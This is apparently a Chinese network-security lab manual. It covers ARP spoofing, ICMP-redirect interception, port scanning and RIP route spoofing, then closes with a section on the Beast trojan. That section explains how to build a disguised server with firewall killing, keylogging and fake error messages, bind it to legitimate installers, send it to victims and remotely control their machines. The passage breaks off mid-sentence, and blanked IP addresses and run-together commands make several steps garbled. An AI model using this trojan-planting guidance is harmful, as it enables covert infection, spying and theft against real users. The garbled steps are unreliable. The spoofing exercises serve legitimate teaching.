《網(wǎng)絡(luò)安全管理課程設(shè)計(jì)》實(shí)訓(xùn)指導(dǎo)書

PAGEPAGE34《網(wǎng)絡(luò)安全管理課程設(shè)計(jì)》實(shí)訓(xùn)實(shí)驗(yàn)指導(dǎo)書

學(xué)習(xí)網(wǎng)絡(luò)安全相關(guān)法律法規(guī)實(shí)驗(yàn)?zāi)康模簩W(xué)習(xí)網(wǎng)絡(luò)安全相關(guān)法律法規(guī)實(shí)驗(yàn)步驟：上網(wǎng)搜索網(wǎng)絡(luò)安全相關(guān)法律法規(guī)；學(xué)習(xí)：《互聯(lián)網(wǎng)上網(wǎng)服務(wù)營(yíng)業(yè)場(chǎng)所管理?xiàng)l例》《互聯(lián)網(wǎng)電子公告服務(wù)管理規(guī)定》《計(jì)算機(jī)病毒防治管理辦法》《中華人民共和國(guó)計(jì)算機(jī)信息系統(tǒng)安全保護(hù)條例》《互聯(lián)網(wǎng)信息服務(wù)管理辦法（國(guó)務(wù)院令第292號(hào)）》《計(jì)算機(jī)信息網(wǎng)絡(luò)國(guó)際聯(lián)網(wǎng)安全保護(hù)管理辦法》《關(guān)于維護(hù)互聯(lián)網(wǎng)安全的決定》《中華人民共和國(guó)刑法(摘錄):第二百八十五條第二百八十六條第二百八十七條》

常用攻擊協(xié)議的原理驗(yàn)證一、ARP欺騙背景描述：流經(jīng)主機(jī)A和主機(jī)C的數(shù)據(jù)包被主機(jī)D使用ARP欺騙進(jìn)行截獲和轉(zhuǎn)發(fā)。流經(jīng)主機(jī)E（接口）和主機(jī)F的數(shù)據(jù)包被主機(jī)B（接口）使用ARP欺騙進(jìn)行截獲和轉(zhuǎn)發(fā)。環(huán)境拓?fù)鋱D如下：原理：ARP表是IP地址和MAC地址的映射關(guān)系表，任何實(shí)現(xiàn)了IP協(xié)議棧的設(shè)備，一般情況下都通過(guò)該表維護(hù)IP地址和MAC地址的對(duì)應(yīng)關(guān)系，這是為了避免ARP解析而造成的廣播數(shù)據(jù)報(bào)文對(duì)網(wǎng)絡(luò)造成沖擊。ARP表的建立一般情況下是通過(guò)二個(gè)途徑：

1、主動(dòng)解析，如果一臺(tái)計(jì)算機(jī)想與另外一臺(tái)不知道MAC地址的計(jì)算機(jī)通信，則該計(jì)算機(jī)主動(dòng)發(fā)ARP請(qǐng)求，通過(guò)ARP協(xié)議建立（前提是這兩臺(tái)計(jì)算機(jī)位于同一個(gè)IP子網(wǎng)上）；

2、被動(dòng)請(qǐng)求，如果一臺(tái)計(jì)算機(jī)接收到了一臺(tái)計(jì)算機(jī)的ARP請(qǐng)求，則首先在本地建立請(qǐng)求計(jì)算機(jī)的IP地址和MAC地址的對(duì)應(yīng)表。因此，針對(duì)ARP表項(xiàng)，一個(gè)可能的攻擊就是誤導(dǎo)計(jì)算機(jī)建立正確的ARP表。根據(jù)ARP協(xié)議，如果一臺(tái)計(jì)算機(jī)接收到了一個(gè)ARP請(qǐng)求報(bào)文，在滿足下列兩個(gè)條件的情況下，該計(jì)算機(jī)會(huì)用ARP請(qǐng)求報(bào)文中的源IP地址和源MAC地址更新自己的ARP緩存：1、如果發(fā)起該ARP請(qǐng)求的IP地址在自己本地的ARP緩存中；2、請(qǐng)求的目標(biāo)IP地址不是自己的。舉例說(shuō)明過(guò)程:假設(shè)有三臺(tái)計(jì)算機(jī)A，B，C，其中B已經(jīng)正確建立了A和C計(jì)算機(jī)的ARP表項(xiàng)。假設(shè)A是攻擊者，此時(shí)，A發(fā)出一個(gè)ARP請(qǐng)求報(bào)文，該ARP請(qǐng)求報(bào)文這樣構(gòu)造：1、源IP地址是C的IP地址，源MAC地址是A的MAC地址；2、請(qǐng)求的目標(biāo)IP地址是B的IP地址。這樣計(jì)算機(jī)B在收到這個(gè)ARP請(qǐng)求報(bào)文后（ARP請(qǐng)求是廣播報(bào)文，網(wǎng)絡(luò)上所有設(shè)備都能收到），發(fā)現(xiàn)C的ARP表項(xiàng)已經(jīng)在自己的緩存中，但MAC地址與收到的請(qǐng)求的源MAC地址不符，于是根據(jù)ARP協(xié)議，使用ARP請(qǐng)求的源MAC地址（即A的MAC地址）更新自己的ARP表。這樣B的ARP緩存中就存在這樣的錯(cuò)誤ARP表項(xiàng)：C的IP地址跟A的MAC地址對(duì)應(yīng)。這樣的結(jié)果是，B發(fā)給C的數(shù)據(jù)都被計(jì)算機(jī)A接收到。步驟：按照拓?fù)浣Y(jié)構(gòu)圖連接網(wǎng)絡(luò)，使用拓?fù)潋?yàn)證檢查連接的正確性。

本練習(xí)將主機(jī)A、C和D作為一組，主機(jī)B、E、F作為一組?，F(xiàn)僅以主機(jī)A、C和D為例說(shuō)明試驗(yàn)步驟。（由于兩組使用的設(shè)備不同，采集到的數(shù)據(jù)包不完全相同）主機(jī)A和主機(jī)C使用“arp-a”命令察看并記錄ARP高速緩存。主機(jī)A、C啟動(dòng)協(xié)議分析器開(kāi)始捕獲數(shù)據(jù)并設(shè)置過(guò)濾條件（提取ARP協(xié)議和ICMP協(xié)議）。主機(jī)Aping主機(jī)C。觀察主機(jī)A、C上是捕獲到的ICMP報(bào)文，記錄MAC地址。主機(jī)D啟動(dòng)仿真編輯器向主機(jī)A編輯ARP請(qǐng)求報(bào)文（暫時(shí)不發(fā)送）。其中：

MAC層：“源MAC地址”設(shè)置為主機(jī)D的MAC地址

“目的MAC地址”設(shè)置為主機(jī)A的MAC地址

ARP層：“源MAC地址”設(shè)置為主機(jī)D的MAC地址

“源IP地址”設(shè)置為主機(jī)C的IP地址

“目的MAC地址”設(shè)置為000000-000000。

“目的IP地址”設(shè)置為主機(jī)A的IP地址主機(jī)D向主機(jī)C編輯ARP請(qǐng)求報(bào)文（暫時(shí)不發(fā)送）。其中：

MAC層：“源MAC地址”設(shè)置為主機(jī)D的MAC地址

“目的MAC地址”設(shè)置為主機(jī)C的MAC地址

ARP層：“源MAC地址”設(shè)置為主機(jī)D的MAC地址

“源IP地址”設(shè)置為主機(jī)A的IP地址

“目的MAC地址”設(shè)置為000000-000000。

“目的IP地址”設(shè)置為主機(jī)C的IP地址同時(shí)發(fā)送第4步和第5步所編輯的數(shù)據(jù)包。

注意：為防止主機(jī)A和主機(jī)C的ARP高速緩存表被其它未知報(bào)文更新，可以定時(shí)發(fā)送數(shù)據(jù)包（例如：每隔500ms發(fā)送一次）。觀察并記錄主機(jī)A和主機(jī)C的ARP高速緩存表。在主機(jī)D上啟動(dòng)靜態(tài)路由服務(wù)（方法：在命令行方式下，輸入“staticroute_config”），目的是實(shí)現(xiàn)數(shù)據(jù)轉(zhuǎn)發(fā)。主機(jī)D禁用ICMP協(xié)議。在命令行下輸入“mmc”，啟動(dòng)微軟管理控制臺(tái)。導(dǎo)入控制臺(tái)文件。單擊“文件(F)\打開(kāi)(O)...”菜單項(xiàng)來(lái)打開(kāi)“c:\WINNT\system32\IPSecPolicy\stopicmp.msc”。導(dǎo)入策略文件。單擊“操作(A)\所有任務(wù)(K)\導(dǎo)入策略(I)...”菜單項(xiàng)來(lái)打開(kāi)“c:\WINNT\system32\IPSecPolicy\stopicmp.ipsec”。此命令執(zhí)行成功后，在策略名稱列表中會(huì)出現(xiàn)“禁用ICMP”項(xiàng)。啟動(dòng)策略。用鼠標(biāo)選中“禁用ICMP”項(xiàng)，單擊右鍵，選擇“指派(A)”菜單項(xiàng)。主機(jī)A上ping主機(jī)C（“ping主機(jī)C的IP地址–n1”）。-n：發(fā)送count指定的ECHO數(shù)據(jù)包數(shù)。通過(guò)這個(gè)命令可以自己定義發(fā)送的個(gè)數(shù)，對(duì)衡量網(wǎng)絡(luò)速度很有幫助。能夠測(cè)試發(fā)送數(shù)據(jù)包的返回平均時(shí)間及時(shí)間的快慢程度。默認(rèn)值為4。主機(jī)A、C停止捕獲數(shù)據(jù)，分析捕獲到的數(shù)據(jù)，并回答以下問(wèn)題：主機(jī)A、C捕獲到的ICMP數(shù)據(jù)包的源MAC地址和目的MAC地址是什么？結(jié)合主機(jī)A和主機(jī)C捕獲到的數(shù)據(jù)包，繪制出第6步發(fā)送的ICMP數(shù)據(jù)包在網(wǎng)絡(luò)中的傳輸路徑圖。主機(jī)D取消對(duì)ICMP的禁用。在微軟管理控制臺(tái)（mmc）上，用鼠標(biāo)選中“禁用ICMP”項(xiàng)，單擊右鍵，選擇“不指派(U)”菜單項(xiàng)。二、利用ICMP重定向進(jìn)行信息竊取原理

在Internet上，主機(jī)數(shù)量要比路由器多出許多，為了提高效率，主機(jī)都不參與路由選擇過(guò)程。主機(jī)通常使用靜態(tài)路由選擇。當(dāng)主機(jī)開(kāi)始聯(lián)網(wǎng)時(shí)，其路由表中的項(xiàng)目數(shù)很有限，通常只知道默認(rèn)路由的IP地址。因此主機(jī)可能會(huì)把某數(shù)據(jù)發(fā)送到一個(gè)錯(cuò)誤的路由，其實(shí)該數(shù)據(jù)本應(yīng)該發(fā)送給另一個(gè)網(wǎng)絡(luò)的。在這種情況下，收到該數(shù)據(jù)的路由器會(huì)把數(shù)據(jù)轉(zhuǎn)發(fā)給正確的路由器，同時(shí)，它會(huì)向主機(jī)發(fā)送ICMP重定向報(bào)文，來(lái)改變主機(jī)的路由表。

路由器發(fā)送ICMPRedirect消息給主機(jī)來(lái)指出存在一個(gè)更好的路由。ICMPRedirect數(shù)據(jù)包使用下圖中顯示的結(jié)構(gòu)。當(dāng)IP數(shù)據(jù)報(bào)應(yīng)該被發(fā)送到另一個(gè)路由器時(shí)，收到數(shù)據(jù)報(bào)的路由器就要發(fā)送ICMP重定向差錯(cuò)報(bào)文給IP數(shù)據(jù)報(bào)的發(fā)送端。ICMP重定向報(bào)文的接收者必須查看三個(gè)IP地址：

（1）導(dǎo)致重定向的IP地址（即ICMP重定向報(bào)文的數(shù)據(jù)位于IP數(shù)據(jù)報(bào)的首部）；

（2）發(fā)送重定向報(bào)文的路由器的IP地址（包含重定向信息的IP數(shù)據(jù)報(bào)中的源地址）；

（3）應(yīng)該采用的路由器的IP地址（在ICMP報(bào)文中的4-7字節(jié)）。類型=5代碼=0-3檢

驗(yàn)

和應(yīng)該使用的路由器IP地址IP首部（包括選項(xiàng)）+原始IP數(shù)據(jù)報(bào)中數(shù)據(jù)的前8字節(jié)

代碼為0：路由器可以發(fā)送這個(gè)ICMP消息來(lái)指出有一個(gè)到達(dá)目標(biāo)網(wǎng)絡(luò)的更好方法。

代碼為1：路由器可以發(fā)送這個(gè)ICMP消息來(lái)指出有一個(gè)到達(dá)目標(biāo)主機(jī)的更好方法。

代碼為2：路由器可以發(fā)送這個(gè)ICMP消息來(lái)指出有一個(gè)更好的方法到達(dá)使用希望的TOS目標(biāo)網(wǎng)絡(luò)。

代碼為3：路由器可以發(fā)送這個(gè)ICMP消息來(lái)指出有一個(gè)更好的方法到達(dá)使用所要求的TOS的目標(biāo)主機(jī)。環(huán)境拓?fù)鋱D如下：步驟：主機(jī)A啟動(dòng)ICMP重定向功能，在命令行方式下輸入“icmpredirect_configenable”。主機(jī)B啟動(dòng)靜態(tài)路由服務(wù)，在命令行方式下輸入“staticroute_config”。主機(jī)A、B、D、E、F啟動(dòng)協(xié)議分析器開(kāi)始捕獲數(shù)據(jù)并設(shè)置過(guò)濾條件（提取ICMP協(xié)議）。主機(jī)Aping主機(jī)E（），察看主機(jī)A、B、D、E、F捕獲到的數(shù)據(jù)。

通過(guò)此ICMP及其應(yīng)答報(bào)文的MAC地址，繪制其在網(wǎng)絡(luò)中的傳輸路徑圖。主機(jī)C模擬主機(jī)B的身份（）向主機(jī)A發(fā)送ICMP重定向報(bào)文，其中：

MAC層：“源MAC地址”設(shè)置為主機(jī)C的MAC地址

“目的MAC地址”設(shè)置為主機(jī)A的MAC地址

IP層：“源IP地址”設(shè)置為主機(jī)B的IP地址（）

“目的IP地址”設(shè)置為主機(jī)A的IP地址（）

ICMP層：“類型”設(shè)置為5

“代碼”設(shè)置為1

“網(wǎng)關(guān)地址”設(shè)置為主機(jī)C的IP地址（）

ICMP數(shù)據(jù)：偽造的主機(jī)A向主機(jī)E發(fā)送的ping請(qǐng)求報(bào)文的一部份（包括整個(gè)IP首部和數(shù)據(jù)的前8個(gè)字節(jié)）。

注意：為防止主機(jī)B的路由表被其它未知數(shù)據(jù)包更新，可以定時(shí)發(fā)送此報(bào)文（例如：每隔500ms發(fā)送一次）。查看主機(jī)A的路由表（routeprint）發(fā)現(xiàn)一條到主機(jī)E的直接路由信息，其網(wǎng)關(guān)是主機(jī)C的IP地址（）。在主機(jī)C上啟動(dòng)靜態(tài)路由服務(wù)（方法：在命令行方式下，輸入“staticroute_config”），并添加一條靜態(tài)路由條目（方法：在命令行方式下，輸入“routeaddmaskmetric2”），目的是實(shí)現(xiàn)數(shù)據(jù)轉(zhuǎn)發(fā)。主機(jī)C禁用ICMP協(xié)議。在命令行下輸入“mmc”，啟動(dòng)微軟管理控制臺(tái)。導(dǎo)入控制臺(tái)文件。單擊“文件(F)\打開(kāi)(O)...”菜單項(xiàng)來(lái)打開(kāi)“c:\WINNT\system32\IPSecPolicy\stopicmp.msc”。導(dǎo)入策略文件。單擊“操作(A)\所有任務(wù)(K)\導(dǎo)入策略(I)...”菜單項(xiàng)來(lái)打開(kāi)“c:\WINNT\system32\IPSecPolicy\stopicmp.ipsec”。此命令執(zhí)行成功后，在策略名稱列表中會(huì)出現(xiàn)“禁用ICMP”項(xiàng)。啟動(dòng)策略。用鼠標(biāo)選中“禁用ICMP”項(xiàng)，單擊右鍵，選擇“指派(A)”菜單項(xiàng)。主機(jī)Aping主機(jī)E（），查看主機(jī)A、B、E、F捕獲到的數(shù)據(jù)：通過(guò)此ICMP及其應(yīng)答報(bào)文的MAC地址，繪制其在網(wǎng)絡(luò)中的傳輸路徑圖。比較兩次ICMP報(bào)文的傳輸路徑，簡(jiǎn)述ICMP重定向報(bào)文的作用。簡(jiǎn)述第5步和第6步在信息竊取過(guò)程中所起到的作用。主機(jī)C取消對(duì)ICMP的禁用。在微軟管理控制臺(tái)（mmc）上，用鼠標(biāo)選中“禁用ICMP”項(xiàng)，單擊右鍵，選擇“不指派(U)”菜單項(xiàng)。主機(jī)C在命令行下輸入“recover_config”,停止靜態(tài)路由服務(wù)。三、TCP與UDP端口掃描環(huán)境拓?fù)鋱D如下：說(shuō)明：IP地址分配規(guī)則為主機(jī)使用原有IP，保證所有主機(jī)在同一網(wǎng)段內(nèi)。步驟：將主機(jī)A和B作為一組，主機(jī)C和D作為一組，主機(jī)E和F作為一組。現(xiàn)僅以主機(jī)A和B為例，說(shuō)明實(shí)驗(yàn)步驟。一：TCPConnect掃描1.在主機(jī)B上啟動(dòng)協(xié)議分析器進(jìn)行數(shù)據(jù)捕獲,并設(shè)置過(guò)濾條件(提取TCP協(xié)議)。

2.在主機(jī)A上使用TCP連接工具，掃描主機(jī)B的某一端口：

a.主機(jī)A上填入主機(jī)B的IP、主機(jī)B的某一開(kāi)放端口號(hào)，點(diǎn)擊“連接”按鈕進(jìn)行連接。

b.觀察提示信息，是否連接上。

c.主機(jī)A點(diǎn)擊“斷開(kāi)”按鈕斷開(kāi)連接。

d.主機(jī)A使用主機(jī)B的某一未開(kāi)放的端口重復(fù)以上試驗(yàn)步驟。

3.察看主機(jī)B捕獲的數(shù)據(jù)，分析連接成功與失敗的數(shù)據(jù)包差別。

結(jié)合捕獲數(shù)據(jù)的差別，說(shuō)明TCPConnet掃描的實(shí)現(xiàn)原理。二：TCPSYN掃描1.在主機(jī)A上使用端口掃描來(lái)獲取主機(jī)B的TCP活動(dòng)端口列表（掃描端口范圍設(shè)置為0~65535）。

2.在主機(jī)B上啟動(dòng)協(xié)議分析器進(jìn)行數(shù)據(jù)捕獲,并設(shè)置過(guò)濾條件(提取TCP協(xié)議)。

3.主機(jī)A編輯TCP數(shù)據(jù)包：

MAC層：

目的MAC地址：B的MAC地址。

源MAC地址：A的MAC地址。

IP層：

源IP地址：A的IP地址。

目的IP地址：B的IP地址。

TCP層：

源端口：A的未用端口（大于1024）。

目的端口：B的開(kāi)放的端口（建議不要選擇常用端口）。

標(biāo)志SYN置為1，其他標(biāo)志置為0。

4.發(fā)送主機(jī)A編輯好的數(shù)據(jù)包。

5.修改主機(jī)A編輯的數(shù)據(jù)包(將目的端口置為主機(jī)B上未開(kāi)放的TCP端口)，將其發(fā)送。

6.察看主機(jī)B捕獲的數(shù)據(jù)，找到主機(jī)A發(fā)送的兩個(gè)數(shù)據(jù)包對(duì)應(yīng)的應(yīng)答包。

分析兩個(gè)應(yīng)答包的不同之處，說(shuō)明TCPSYN掃描的實(shí)現(xiàn)原理。三：UDP端口掃描1.在主機(jī)B上使用命令“netstat-a”，顯示本機(jī)可用的TCP、UDP端口。注意：通過(guò)此命令，會(huì)得到一個(gè)UDP開(kāi)放端口列表，同學(xué)可以在UDP開(kāi)放端口列表中任選一個(gè)來(lái)完成此練習(xí)。下面以microsoft-ds（445）端口為例，說(shuō)明練習(xí)步驟。

2.在主機(jī)B上啟動(dòng)協(xié)議分析器進(jìn)行數(shù)據(jù)捕獲并設(shè)置過(guò)濾條件(提取主機(jī)A的IP和主機(jī)B的IP)。

3.主機(jī)A編輯UDP數(shù)據(jù)包：

MAC層：

目的MAC地址：B的MAC地址。

源MAC地址：A的MAC地址。

IP層：

源IP地址：A的IP地址。

目的IP地址：B的IP地址。

UDP層：

源端口：A的可用端口。

目的端口：B開(kāi)放的UDP端口445。

4.發(fā)送主機(jī)A編輯好的數(shù)據(jù)包。

5.修改主機(jī)A編輯的數(shù)據(jù)包(將目的端口置為主機(jī)B上未開(kāi)放的UDP端口)，將其發(fā)送。

6.察看主機(jī)B捕獲的數(shù)據(jù)。

主機(jī)A發(fā)送的數(shù)據(jù)包，哪個(gè)收到目的端口不可達(dá)的ICMP數(shù)據(jù)報(bào)。

說(shuō)明這種端口掃描的原理。

使用這種端口掃描得到的結(jié)果準(zhǔn)確嗎？說(shuō)明理由。四、路由欺騙原理：RIP協(xié)議是通過(guò)周期性（一般情況下為30S）的路由更新報(bào)文來(lái)維護(hù)路由表的，一臺(tái)運(yùn)行RIP路由協(xié)議的路由器，如果從一個(gè)接口上接收到了一個(gè)路由更新報(bào)文，它就會(huì)分析其中包含的路由信息，并與自己的路由表進(jìn)行比較，如果該路由器認(rèn)為這些路由信息比自己所掌握的要有效，它便把這些路由信息引入自己的路由表中。

這樣如果一個(gè)攻擊者向一臺(tái)運(yùn)行RIP協(xié)議的路由器發(fā)送了人為構(gòu)造的帶破壞性的路由更新報(bào)文，就很容易的把路由器的路由表搞紊亂，從而導(dǎo)致網(wǎng)絡(luò)中斷。

如果運(yùn)行RIP路由協(xié)議的路由器啟用了路由更新信息的HMAC驗(yàn)證，則可從很大程度上避免這種攻擊，另外RIP第二版增加了在安全方面的功能。環(huán)境拓?fù)鋱D如下：步驟：在主機(jī)A、B、D、E、F上啟動(dòng)協(xié)議分析器開(kāi)始捕獲數(shù)據(jù)，并設(shè)置過(guò)濾條件（提取RIP和ICMP）。主機(jī)B和主機(jī)E啟動(dòng)RIP協(xié)議并添加新接口：

①

在主機(jī)B上啟動(dòng)RIP協(xié)議：在命令行方式下輸入“rip_config”；

②

在主機(jī)E上啟動(dòng)RIP協(xié)議：在命令行方式下輸入“rip_config”；

③

添加主機(jī)B的接口：

添加IP為的接口：在命令行方式下輸入“rip_config"的接口名"enable”；

添加IP為的接口：在命令行方式下輸入“rip_config"的接口名"enable”；

④

添加主機(jī)E的接口：

添加IP為的接口：在命令行方式下輸入“rip_config"的接口名"enable”；

添加IP為的接口：在命令行方式下輸入“rip_config"的接口名"enable”。等待一段時(shí)間，直到主機(jī)B和主機(jī)E的路由表達(dá)到穩(wěn)定態(tài)。使用“netshroutingipshowrtmroutes”命令察看主機(jī)B和主機(jī)E的路由表。通過(guò)主機(jī)Aping主機(jī)F（）。通過(guò)主機(jī)A、B、D、E、F上協(xié)議分析器采集到的數(shù)據(jù)包，記錄ping報(bào)文的路徑。在主機(jī)C上啟動(dòng)靜態(tài)路由。在命令行方式下，輸入“staticroute_config”。

為主機(jī)C添加兩個(gè)靜態(tài)路由條目在命令行方式下，輸入：

“routeaddmaskmetric2”；

“routeaddmaskmetric2”；

目的是實(shí)現(xiàn)數(shù)據(jù)轉(zhuǎn)發(fā)。在主機(jī)C上啟動(dòng)協(xié)議仿真編輯器，編輯RIP-Request報(bào)文。

MAC層：源MAC地址：主機(jī)C的MAC地址

目的MAC地址：主機(jī)B的MAC地址（接口對(duì)應(yīng)的MAC）

IP層：源IP地址：主機(jī)C的IP地址

目的IP地址：廣播地址（55）

UDP層：源端口：520

目的端口：520

RIP層：命令：1（RIP-Response）

版本：2

路由選擇信息選項(xiàng)號(hào)：右擊，追加塊

計(jì)算“長(zhǎng)度”和“校驗(yàn)和”字段，填充后發(fā)送。察看主機(jī)B的鄰居列表（在命令行方式下，輸入“rip_configshowneighbor”），確定主機(jī)B添加了一個(gè)新鄰居（）。在主機(jī)C上，編輯RIP-Response報(bào)文。

MAC層：源MAC地址：主機(jī)C的MAC地址。

目的MAC地址：主機(jī)B的MAC地址（接口對(duì)應(yīng)的MAC）。

IP層：源IP地址：主機(jī)C的IP地址。

目的IP地址：廣播地址（55）。

UDP層：

源端口：520。

目的端口：520。RIP層：命令：2（RIP-Response）。

版本：2。

路由選擇信息選項(xiàng)號(hào)：右擊，追加塊。

地址族ID：2。

網(wǎng)絡(luò)地址：。

下一跳路由器：主機(jī)C地址（）。

度量：1。

計(jì)算并填充“長(zhǎng)度”和“校驗(yàn)和”，以時(shí)間間隔為1秒發(fā)送此報(bào)文6000次。察看主機(jī)B的路由表中路由條目變化。通過(guò)主機(jī)A來(lái)ping主機(jī)F（）。通過(guò)主機(jī)A、B、D、E、F上協(xié)議分析器，記錄ping報(bào)文的路徑。比較兩次ping報(bào)文的路徑。簡(jiǎn)述發(fā)生欺騙的原理（DV算法）。主機(jī)C輸入“recover_config”，停止靜態(tài)路由服務(wù)。輸入“routedelete”和“routedelete”刪除手工添加的靜態(tài)路由條目。

典型木馬的原理及使用實(shí)驗(yàn)?zāi)康?1.理解典型木馬的原理。2.掌握典型木馬的使用。3.了解典型木馬的清除和防御。實(shí)驗(yàn)設(shè)備:兩臺(tái)安裝Windows2000/2003/XP或更高級(jí)別的Windows操作系統(tǒng)的主機(jī)。所用軟件：Beast2.02、CHM文件生成軟件、廣外男生一、線性插入型木馬禽獸木馬beast實(shí)驗(yàn)步驟：1．服務(wù)端的配置（1）禽獸木馬下載解壓后只有一個(gè)可執(zhí)行文件Beast.exe，它是禽獸的客戶端，其服務(wù)器端需要由此文件生成，再發(fā)送別人運(yùn)行后客戶端才能進(jìn)行控制。（2）雙擊運(yùn)行客戶端文件，點(diǎn)擊禽獸木馬的客戶端程序主界面中的“生成服務(wù)”按鈕，進(jìn)入服務(wù)端設(shè)置對(duì)話框。在“基礎(chǔ)設(shè)置”里，可以設(shè)置木馬的名稱、開(kāi)放端口、連接密碼及木馬的安裝目錄，是否注入到InternetExplorer和Explorer.exe等。如果沒(méi)有使用注入技術(shù)，在WindowsXP/2000的任務(wù)管理器中可以發(fā)現(xiàn)其進(jìn)程，但是這種方式的連接成功率很高，可達(dá)100%。在“信息通知”里，你可以設(shè)置收取受害者IP的ICQ號(hào)碼、E-mail地址等，只是E-mail地址不支持Hotmail賬戶。在“啟動(dòng)鍵”里，可以設(shè)置將木馬的根鍵放到注冊(cè)表的什么地方。在“防火墻殺除”里，可以設(shè)置啟動(dòng)時(shí)是否關(guān)閉防火墻和某些進(jìn)程，至于關(guān)閉哪些種類的防火墻和進(jìn)程。點(diǎn)擊“設(shè)置”按鈕即可進(jìn)入殺除設(shè)置對(duì)話框。對(duì)于列表中不存在的防火墻或是進(jìn)程，你想要在啟動(dòng)時(shí)清除的話，可以在列表中直接添加。最多可以達(dá)到500個(gè)防火墻或是進(jìn)程服務(wù)，并且可以設(shè)置每幾秒鐘殺除一次，對(duì)于WindowsXP自帶的防火墻可以選擇殺除。防火墻進(jìn)程名不可以加入擴(kuò)展名.exe。在“混合選項(xiàng)”中可以設(shè)置安裝后是否自毀服務(wù)端，是否允許使用鍵盤記錄，是否顯示虛假錯(cuò)誤信息等，至于顯示什么樣的錯(cuò)誤信息可以點(diǎn)擊“虛假錯(cuò)誤信息”旁邊的“配置”按鈕進(jìn)行設(shè)置。如果選擇“自毀服務(wù)端”將在第一次運(yùn)行后自動(dòng)刪除服務(wù)端本身，“虛假信息”同樣僅限于第一次運(yùn)行，建議不要兩項(xiàng)同時(shí)選取。在“exe圖標(biāo)”里，你可以任意設(shè)置服務(wù)端的圖標(biāo)，也可以點(diǎn)擊“從文件中選取圖標(biāo)”按鈕從某個(gè)文件中選取其圖標(biāo)，以增強(qiáng)木馬的隱蔽性。設(shè)置好以后你就可以點(diǎn)擊下側(cè)的“生成”按鈕，滿足需要的服務(wù)器端就生成了，默認(rèn)的文件名為server.exe文件，你可以任意改名后與別的文件進(jìn)行捆綁。（3）如果需要對(duì)文件進(jìn)行捆綁，則可以直接點(diǎn)擊“捆綁”按鈕，將木馬文件添加進(jìn)去，再添加要捆綁的程序文件，并且取原文件一樣的圖標(biāo)，然后點(diǎn)擊“捆綁文件”按鈕，并設(shè)置好新生成的文件名稱（可同原有的文件一樣，以增強(qiáng)隱蔽性），點(diǎn)擊“保存”即可。仔細(xì)比較會(huì)發(fā)現(xiàn)捆綁了禽獸木馬的文件比原文件大50K左右。2.實(shí)施控制服務(wù)端配置好以后，就可以發(fā)送給別人執(zhí)行以后，你就可實(shí)施遠(yuǎn)程控制了。運(yùn)行客戶端程序beast.exe，在程序主界面的左上角主機(jī)地址處填入對(duì)方的IP地址，端口處填入端口地址（默認(rèn)是6666，就看你在設(shè)置時(shí)是否更改），連接密碼處填入你當(dāng)初設(shè)置的連接密碼，然后點(diǎn)擊“開(kāi)始連接”，如果連接密碼正確（也即是你種的木馬），很快就可連接上肉機(jī)。連接肉機(jī)以后，你就可運(yùn)行右下側(cè)的命令對(duì)此肉機(jī)進(jìn)行遠(yuǎn)程控制了。（1）選中“管理命令”，則可遠(yuǎn)程進(jìn)行文件管理、桌面進(jìn)程管理、遠(yuǎn)程桌面、注冊(cè)表項(xiàng)、所有進(jìn)程、遠(yuǎn)程監(jiān)視等操作。如我們想要遠(yuǎn)程對(duì)文件進(jìn)行操作，可以單擊“文件管理”按鈕，即可對(duì)遠(yuǎn)程機(jī)器進(jìn)行文件管理，點(diǎn)擊“查找硬盤”，然后選中某個(gè)驅(qū)動(dòng)器，再點(diǎn)擊“顯示文件”，該驅(qū)動(dòng)器所有的文件便可顯示出來(lái)。所有可進(jìn)行的操作都清晰地顯示在文件列表的右側(cè)，你可以進(jìn)行下載、上傳、刪除、查找、執(zhí)行、重命名文件等操作。同樣單擊“注冊(cè)表項(xiàng)”可以對(duì)遠(yuǎn)程注冊(cè)表進(jìn)行操作，可以在某個(gè)根鍵或是子鍵下添加或刪除某個(gè)子鍵或鍵值。點(diǎn)擊“所有進(jìn)程”，即可對(duì)遠(yuǎn)程機(jī)器的進(jìn)程進(jìn)行管理，如想關(guān)閉某個(gè)進(jìn)程，可以選中該進(jìn)程，再點(diǎn)擊“KillProc”按鈕即可輕松刪除某個(gè)進(jìn)程，有時(shí)本地都不能刪除的，遠(yuǎn)程倒還可以輕松刪除。（2）選中“系統(tǒng)操作”，則可以對(duì)遠(yuǎn)程機(jī)器實(shí)施隱藏所有、關(guān)閉電源、遠(yuǎn)程關(guān)機(jī)、殺掉所有、遠(yuǎn)程重啟、遠(yuǎn)程注銷等操作。（3）選中“惡作劇”，則可以對(duì)遠(yuǎn)程機(jī)器實(shí)施隱藏托盤、禁止托盤、隱藏開(kāi)始、打開(kāi)光驅(qū)、鎖定鼠標(biāo)、隱藏時(shí)鐘等操作。另外，在雜項(xiàng)中還可以查看到肉機(jī)的主機(jī)信息及服務(wù)端的信息，可向?qū)Ψ桨l(fā)送消息（相當(dāng)于冰河信使），運(yùn)行DOS命令查看對(duì)方信息等操作。這個(gè)線程插入木馬，比我們以前使用的一些木馬功能還要強(qiáng)大得多，而這個(gè)線程插入技術(shù)使得對(duì)方既不易發(fā)現(xiàn)你的木馬，而且也不容易清除。3.木馬植入肉雞的方法如果我們要想把自己的木馬植入到別人的計(jì)算機(jī)上，首先就要偽裝好自己。一般來(lái)講，木馬主要有兩種隱藏手段：一.把自己偽裝成一般的軟件很多用戶可能都遇到過(guò)這樣的情況，在網(wǎng)站上得到一個(gè)自稱是很好玩的小程序，拿下來(lái)執(zhí)行，但系統(tǒng)報(bào)告了內(nèi)部錯(cuò)誤，程序退出了。一般人都會(huì)認(rèn)為是程序沒(méi)有開(kāi)發(fā)好，不會(huì)懷疑到運(yùn)行了木馬程序這上面。等到運(yùn)行自己的QQ等程序時(shí)，被告知密碼不對(duì)，自己熟得不能再熟的密碼怎么也進(jìn)不去，這時(shí)才會(huì)想起檢查自己的機(jī)器是否被人安裝了木馬這回事情。這種程序偽裝成正常程序，實(shí)質(zhì)是個(gè)木馬偽裝成的，在木馬代碼的前段會(huì)完成自我安裝與隱藏的過(guò)程，最后顯示一個(gè)錯(cuò)誤信息，騙過(guò)用戶。二.把自己綁定在正常的程序上面對(duì)于那些老到的黑客來(lái)說(shuō)，他們可以通過(guò)一些捆綁軟件把一個(gè)正版的安裝程序和木馬捆綁成一個(gè)新的文件，然后用戶在安裝該正版程序時(shí)，就神不知鬼不覺(jué)地被種上木馬了。不過(guò)，這種木馬是有可能被細(xì)心的用戶發(fā)覺(jué)的，因?yàn)檫@個(gè)WinZip程序在綁定了木馬之后尺寸通常都會(huì)變大。偽裝之后，木馬就可以通過(guò)郵件發(fā)給被攻擊者了，或者是放在網(wǎng)站上供人下載。黑客還會(huì)為它們加上一些動(dòng)人的話語(yǔ)來(lái)